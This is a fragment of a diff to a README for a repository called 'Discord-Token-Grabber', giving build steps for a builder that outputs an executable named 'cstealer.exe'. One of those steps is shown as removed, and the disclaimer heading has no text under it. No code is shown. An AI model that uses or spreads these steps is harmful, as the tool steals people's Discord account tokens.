c-nnor/Discord-Token-Grabber/README.md

 1. Fork repository
 2. build project executable in VS
 4. Run the builder by double clicking the `discordGrabber.exe` file
-5. Follow instructions in builder and your exe will be found in the `dist` folder under the name `cstealer.exe`

 ## Disclaimer: